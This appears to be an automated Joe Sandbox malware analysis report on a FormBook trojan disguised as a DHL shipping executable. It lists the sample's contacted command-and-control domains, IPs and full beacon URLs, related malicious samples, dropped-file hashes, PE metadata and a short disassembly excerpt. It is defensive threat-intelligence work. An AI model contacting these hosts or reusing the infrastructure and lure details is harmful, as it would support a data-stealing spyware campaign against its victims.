            https://www.empowermedeco.com/fo8o/?UzG=mxnR0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?UzG=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&SFst=D27DuB0%Avira URL Cloudsafe
            http://www.empowermedeco.com0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?UzG=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&SFst=D27DuB100%Avira URL Cloudmalware
            http://www.magmadokum.com/fo8o/?SFst=D27DuB&UzG=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==0%Avira URL Cloudsafe
            http://www.goldenjade-travel.com/fo8o/?SFst=D27DuB&UzG=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==100%Avira URL Cloudmalware
            http://www.3xfootball.com/fo8o/?SFst=D27DuB&UzG=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==0%Avira URL Cloudsafe
            http://www.techchains.info/fo8o/100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            195.110.124.133
            truefalse
              high
              empowermedeco.com
              217.196.55.202
              truefalse
                high
                www.3xfootball.com
                154.215.72.110
                truetrue
                  unknown
                  www.goldenjade-travel.com
                  116.50.37.244
                  truefalse
                    high
                    www.rssnewscast.com
                    91.195.240.94
                    truetrue
                      unknown
                      www.techchains.info
                      66.29.149.46
                      truetrue
                        unknown
                        natroredirect.natrocdn.com
                        85.159.66.93
                        truefalse
                          high
                          www.magmadokum.com
                          unknown
                          unknowntrue
                            unknown
                            www.donnavariedades.com
                            unknown
                            unknownfalse
                              high
                              www.660danm.top
                              unknown
                              unknowntrue
                                unknown
                                www.joyesi.xyz
                                unknown
                                unknownfalse
                                  high
                                  www.liangyuen528.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.kasegitai.tokyo
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.empowermedeco.com
                                      unknown
                                      unknownfalse
                                        high
                                        www.k9vyp11no3.cfd
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.elettrosistemista.zip
                                          unknown
                                          unknownfalse
                                            high
                                            www.antonio-vivaldi.mobi
                                            unknown
                                            unknowntrue
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.elettrosistemista.zip/fo8o/?SFst=D27DuB&UzG=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==true
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.empowermedeco.com/fo8o/false
                                                high
                                                http://www.elettrosistemista.zip/fo8o/false
                                                  high
                                                  http://www.empowermedeco.com/fo8o/?UzG=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&SFst=D27DuBtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.3xfootball.com/fo8o/?SFst=D27DuB&UzG=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.goldenjade-travel.com/fo8o/?SFst=D27DuB&UzG=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==true
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.magmadokum.com/fo8o/false
                                                    high
                                                    http://www.rssnewscast.com/fo8o/?UzG=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&SFst=D27DuBtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.rssnewscast.com/fo8o/false
                                                      high
                                                      http://www.magmadokum.com/fo8o/?SFst=D27DuB&UzG=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.goldenjade-travel.com/fo8o/false
                                                        high
                                                        http://www.techchains.info/fo8o/true
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.empowermedeco.comyAEEhNGBaPExAdMu.exe, 00000006.00000002.4532024343.0000000004E6A000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000004.00000002.4530981261.000000000488E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4532489216.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.000000000356E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.empowermedeco.com/fo8o/?UzG=mxnRnetbtugc.exe, 00000004.00000002.4530981261.00000000051FA000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003EDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.sedo.com/services/parking.php3yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.000000000356E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000004.00000002.4530981261.0000000004BB2000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003892000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000004.00000002.4530981261.0000000004BB2000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003892000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                91.195.240.94
                                                                                www.rssnewscast.comGermany
                                                                                47846SEDO-ASDEtrue
                                                                                154.215.72.110
                                                                                www.3xfootball.comSeychelles
                                                                                132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                195.110.124.133
                                                                                elettrosistemista.zipItaly
                                                                                39729REGISTER-ASITfalse
                                                                                116.50.37.244
                                                                                www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                85.159.66.93
                                                                                natroredirect.natrocdn.comTurkey
                                                                                34619CIZGITRfalse
                                                                                66.29.149.46
                                                                                www.techchains.infoUnited States
                                                                                19538ADVANTAGECOMUStrue
                                                                                217.196.55.202
                                                                                empowermedeco.comNorway
                                                                                29300AS-DIRECTCONNECTNOfalse
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1580265
                                                                                Start date and time:2024-12-24 08:22:09 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 10m 32s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:7
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:2
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:DHL 806-232024.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@14/7
                                                                                EGA Information:
                                                                                • Successful, ratio: 75%
                                                                                HCA Information:
                                                                                • Successful, ratio: 98%
                                                                                • Number of executed functions: 46
                                                                                • Number of non-executed functions: 273
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target yAEEhNGBaPExAdMu.exe, PID 4416 because it is empty
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                TimeTypeDescription
                                                                                02:23:55API Interceptor11527512x Sleep call for process: netbtugc.exe modified
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                91.195.240.94DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                • www.rssnewscast.com/fo8o/
                                                                                DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                • www.rssnewscast.com/fo8o/
                                                                                236236236.elfGet hashmaliciousUnknownBrowse
                                                                                • suboyule.736t.com/
                                                                                DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                • www.rssnewscast.com/fo8o/
                                                                                DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                • www.rssnewscast.com/fo8o/
                                                                                CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                • www.rssnewscast.com/fo8o/
                                                                                Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                • www.rssnewscast.com/fo8o/
                                                                                Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                • www.rssnewscast.com/fo8o/
                                                                                Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                • www.rssnewscast.com/fo8o/
                                                                                Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                • www.rssnewscast.com/fo8o/
                                                                                154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                                • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                                • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                POWERLINE-AS-APPOWERLINEDATACENTERHKspc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 160.124.107.222
                                                                                nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                • 45.202.220.148
                                                                                x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 154.216.83.118
                                                                                arm7.nn-20241219-1505.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 154.193.11.9
                                                                                arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 193.108.46.191
                                                                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 154.86.45.150
                                                                                arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 156.250.45.228
                                                                                DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                • 154.215.72.110
                                                                                DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                • 154.215.72.110
                                                                                http://93287.mobiGet hashmaliciousUnknownBrowse
                                                                                • 154.203.26.164
                                                                                REGISTER-ASITDHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.110.124.133
                                                                                DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.110.124.133
                                                                                DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.110.124.133
                                                                                DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.110.124.133
                                                                                SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.110.124.133
                                                                                CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.110.124.133
                                                                                ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 195.110.124.133
                                                                                Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.110.124.133
                                                                                Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                • 195.110.124.133
                                                                                DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 195.110.124.133
                                                                                SEDO-ASDEDHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                • 91.195.240.94
                                                                                DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                • 91.195.240.94
                                                                                236236236.elfGet hashmaliciousUnknownBrowse
                                                                                • 91.195.240.94
                                                                                DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                • 91.195.240.94
                                                                                DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                • 91.195.240.94
                                                                                CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                • 91.195.240.94
                                                                                Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                • 91.195.240.94
                                                                                Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                • 91.195.240.94
                                                                                Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                • 91.195.240.94
                                                                                Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                • 91.195.240.94
                                                                                No context
                                                                                No context
                                                                                Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.121297215059106
                                                                                Encrypted:false
                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\DHL 806-232024.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):270848
                                                                                Entropy (8bit):7.994890060838224
                                                                                Encrypted:true
                                                                                SSDEEP:6144:erdAJyg++76oixY/d4N3nmUTTPuYRdNAupuwKC9jV2ATAO4:m3c958nBju0puwuATAO4
                                                                                MD5:916D818164507B82ED06D9EAF7EFA826
                                                                                SHA1:2E673CADE434B61F3EA00B43BC925F274C417C6C
                                                                                SHA-256:4FB6D51F62CB32C04C55E697D7199AFCF3A82FAA0F75007449E4664B8B27715D
                                                                                SHA-512:DBD435E11EEB951BECDDFD7618619F3A86EE9BB9FB78F5F2B5238B16F3A11EBA46730E704749767297533488D53BDD35264E978E78B7AE47060F7F07071087A1
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:u..d.DIWH..D...n.5N....MC...Z66DIWHAOLM1MYGRL5MY8R8NKH8SZ6.DIWF^.BM.D.f.My.xl:Q=k8J<=DW)i4)/!#9./<g 9[m0Vr|..hU<>S.ID]lAOLM1MY>SE.p9_...,..3=.,..r!(.W..{2+.W.....,.j:9^.$..HAOLM1MY..L5.X9R.&..8SZ66DIW.AMMF0FYGBH5MY8R8NKH.FZ66TIWHaKLM1.YGBL5M[8R>NKH8SZ60DIWHAOLM.IYGPL5MY8R:N..8SJ66TIWHA_LM!MYGRL5]Y8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLcE(!3RL5.V<R8^KH8C^66TIWHAOLM1MYGRL5mY828NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5
                                                                                Process:C:\Users\user\Desktop\DHL 806-232024.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):270848
                                                                                Entropy (8bit):7.994890060838224
                                                                                Encrypted:true
                                                                                SSDEEP:6144:erdAJyg++76oixY/d4N3nmUTTPuYRdNAupuwKC9jV2ATAO4:m3c958nBju0puwuATAO4
                                                                                MD5:916D818164507B82ED06D9EAF7EFA826
                                                                                SHA1:2E673CADE434B61F3EA00B43BC925F274C417C6C
                                                                                SHA-256:4FB6D51F62CB32C04C55E697D7199AFCF3A82FAA0F75007449E4664B8B27715D
                                                                                SHA-512:DBD435E11EEB951BECDDFD7618619F3A86EE9BB9FB78F5F2B5238B16F3A11EBA46730E704749767297533488D53BDD35264E978E78B7AE47060F7F07071087A1
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:u..d.DIWH..D...n.5N....MC...Z66DIWHAOLM1MYGRL5MY8R8NKH8SZ6.DIWF^.BM.D.f.My.xl:Q=k8J<=DW)i4)/!#9./<g 9[m0Vr|..hU<>S.ID]lAOLM1MY>SE.p9_...,..3=.,..r!(.W..{2+.W.....,.j:9^.$..HAOLM1MY..L5.X9R.&..8SZ66DIW.AMMF0FYGBH5MY8R8NKH.FZ66TIWHaKLM1.YGBL5M[8R>NKH8SZ60DIWHAOLM.IYGPL5MY8R:N..8SJ66TIWHA_LM!MYGRL5]Y8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLcE(!3RL5.V<R8^KH8C^66TIWHAOLM1MYGRL5mY828NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.163199461679591
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:DHL 806-232024.exe
                                                                                File size:1'208'832 bytes
                                                                                MD5:a32e770c62bab92fb9f5413a70a62836
                                                                                SHA1:46578409fab1fbe2a943bf685f672334643332ed
                                                                                SHA256:00157cae4f7d3b063ab95dcfd1ec233bb79a0fd54a18558fd104ca4599c38874
                                                                                SHA512:ac4f681f817c54651efd3460927ac785b7007ccd4d26d24c983dcf6fea475a336c4dbdcaa3e6298133132b06ed35fbec4817a187c6c583eae939e2f5e028fc23
                                                                                SSDEEP:24576:0AHnh+eWsN3skA4RV1Hom2KXMmHahTuMSynkiBU5:Dh+ZkldoPK8YahTuMvnkD
                                                                                TLSH:CD45BD0273D5C036FFABA2739B6AF60556BC7D254123852F13981DB9BC701B2262E763
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                                                Icon Hash:aaf3e3e3938382a0
                                                                                Entrypoint:0x42800a
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6769FAED [Tue Dec 24 00:06:05 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:1
                                                                                File Version Major:5
                                                                                File Version Minor:1
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:1
                                                                                Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                Instruction
                                                                                call 00007F471856654Dh
                                                                                jmp 00007F4718559304h
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                push edi
                                                                                push esi
                                                                                mov esi, dword ptr [esp+10h]
                                                                                mov ecx, dword ptr [esp+14h]
                                                                                mov edi, dword ptr [esp+0Ch]
                                                                                mov eax, ecx
                                                                                mov edx, ecx
                                                                                add eax, esi
                                                                                cmp edi, esi
                                                                                jbe 00007F471855948Ah
                                                                                cmp edi, eax
                                                                                jc 00007F47185597EEh
                                                                                bt dword ptr [004C41FCh], 01h
                                                                                jnc 00007F4718559489h
                                                                                rep movsb
                                                                                jmp 00007F471855979Ch
                                                                                cmp ecx, 00000080h
                                                                                jc 00007F4718559654h
                                                                                mov eax, edi
                                                                                xor eax, esi
                                                                                test eax, 0000000Fh
                                                                                jne 00007F4718559490h
                                                                                bt dword ptr [004BF324h], 01h
                                                                                jc 00007F4718559960h
                                                                                bt dword ptr [004C41FCh], 00000000h
                                                                                jnc 00007F471855962Dh
                                                                                test edi, 00000003h
                                                                                jne 00007F471855963Eh
                                                                                test esi, 00000003h
                                                                                jne 00007F471855961Dh
                                                                                bt edi, 02h
                                                                                jnc 00007F471855948Fh
                                                                                mov eax, dword ptr [esi]
                                                                                sub ecx, 04h
                                                                                lea esi, dword ptr [esi+04h]
                                                                                mov dword ptr [edi], eax
                                                                                lea edi, dword ptr [edi+04h]
                                                                                bt edi, 03h
                                                                                jnc 00007F4718559493h
                                                                                movq xmm1, qword ptr [esi]
                                                                                sub ecx, 08h
                                                                                lea esi, dword ptr [esi+08h]
                                                                                movq qword ptr [edi], xmm1
                                                                                lea edi, dword ptr [edi+08h]
                                                                                test esi, 00000007h
                                                                                je 00007F47185594E5h
                                                                                bt esi, 03h
                                                                                Programming Language:
                                                                                • [ASM] VS2013 build 21005
                                                                                • [ C ] VS2013 build 21005
                                                                                • [C++] VS2013 build 21005
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                • [ASM] VS2013 UPD5 build 40629
                                                                                • [RES] VS2013 build 21005
                                                                                • [LNK] VS2013 UPD5 build 40629
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x5ca58.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x7134.reloc
